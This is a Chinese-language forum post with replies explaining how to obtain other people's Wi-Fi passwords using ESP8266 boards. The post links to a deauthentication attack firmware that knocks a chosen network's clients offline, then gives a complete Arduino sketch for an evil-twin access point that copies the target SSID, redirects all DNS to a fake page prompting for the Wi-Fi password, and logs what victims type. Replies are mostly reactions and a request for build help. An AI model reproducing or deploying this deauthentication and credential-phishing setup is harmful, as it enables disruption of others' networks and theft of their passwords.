利用8266获取任何wifi密码

dadv · 发表于 2020-3-24 21:05

本帖最后由 dadv 于 2020-3-24 23:49 编辑

前言
1、使用esp8266wifi攻击+esp8266钓鱼
2、烧写攻击固件bin，
固件地址为`链接：https://pan.baidu.com/s/1WBGKKZ9HAtKcQV5VcnZN0w
提取码：4o8a
复制这段内容后打开百度网盘手机App，操作更方便哦`
地址为0x0000 ，烧写成功以后，稍等片刻，会看到一个wifi为zhangguanzhang的ssid，密码为ssid,连接上去，地址192.168.4.1，页面如下
![在这里插入图片描述](

?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzI3Mzg3MDE3,size_16,color_FFFFFF,t_70)
选择一个wifi信号比较强的，如图我选中了yanjie，然后点击边栏攻击
![点击开始](

?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzI3Mzg3MDE3,size_16,color_FFFFFF,t_70)
点击开始，就可以，目标网络就会断线，客户连接不上。此时我们创建同SSID的wifi，使用arduino，代码如下
`[mw_shl_code=arduino,true]#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266WiFi.h>

//调试定义
#define DebugBegin(baud_rate) Serial.begin(baud_rate)
#define DebugPrintln(message) Serial.println(message)
#define DebugPrint(message) Serial.print(message)
#define DebugPrintF(...) Serial.printf( __VA_ARGS__ )

const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);

void web(){
   String html = "";
  html +="<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>";
  html += "<head ><title>wifi需要重置</title></head>";
  html += " <body><script type='text/javascript'>";
  html += " var code = prompt('请输入wifi密码：');";
  html += "  window.location.href='app?a='+code;";
  html += "  </script>";
  html += "  </body>";
  webServer.send(200, "text/html", html);



  }
void paa(){
  DebugPrintln("密码");
  DebugPrintln(webServer.arg(0));


  }

void setup() {
  DebugBegin(115200);
  WiFi.mode(WIFI_AP);
  WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
  WiFi.softAP("yanjie");//目标wifi修改成目标wifi

  // 所有请求都映射到一个具体地址
  dnsServer.start(DNS_PORT, "*", apIP);

  // replay to all requests with same HTML
  webServer.onNotFound([]() {

web();
  });
  webServer.on("/app",paa);
  webServer.begin();
  //webServer.onNotFound(paa);
}

void loop() {
  dnsServer.processNextRequest();
  webServer.handleClient();

}[/mw_shl_code]`
烧写完以后，我们查看串口信息，波特率115200，正常用户就会尝试连接这个wifi，一旦连接上，就会跳转网页，请求输入WiFi密码
如有疑问，qq1652002925

n1001 · 发表于 2020-3-25 08:43

让我想起了QQ盗号的网站

跑龙套的保 · 发表于 2020-4-2 10:09

就这？

jiaoshou · 发表于 2020-4-2 23:53

给你点赞大写的牛逼

Jinbauncle · 发表于 2020-4-21 14:35

这个应该叫（WIFI）诱骗器，和楼上说的一样，就和以前的qq钓鱼网站一样和哈哈哈哈

keliyuan · 发表于 2020-4-25 23:40

请教你这是用2块8266板子，1个烧录攻击，一个烧录钓鱼吗？
用 Arduino IDE那个代码怎么编译不成功？更详细讲一下，第二个钓鱼下载过程吗？

mr7 · 发表于 2020-4-26 19:07

只限研究吧！

dadv · 发表于 2020-5-9 23:27

keliyuan 发表于 2020-4-25 23:40
请教你这是用2块8266板子，1个烧录攻击，一个烧录钓鱼吗？
用 Arduino IDE那个代码怎么编译不成功？更详细 ...

都这么简单了

cluse · 发表于 2020-5-11 07:57

呵呵，10年前我就用过linux下读取wep加密wifi的密码，也不敢像你这样吹啊。
现在的路由器，哪这么容易崩啊。

dadv · 发表于 2020-5-12 21:02

cluse 发表于 2020-5-11 07:57
呵呵，10年前我就用过linux下读取wep加密wifi的密码，也不敢像你这样吹啊。
现在的路由器，哪这么容易崩啊 ...

你还是太高估了，作为安全研究者，是做过研究的

		自动登录	找回密码
密码			立即注册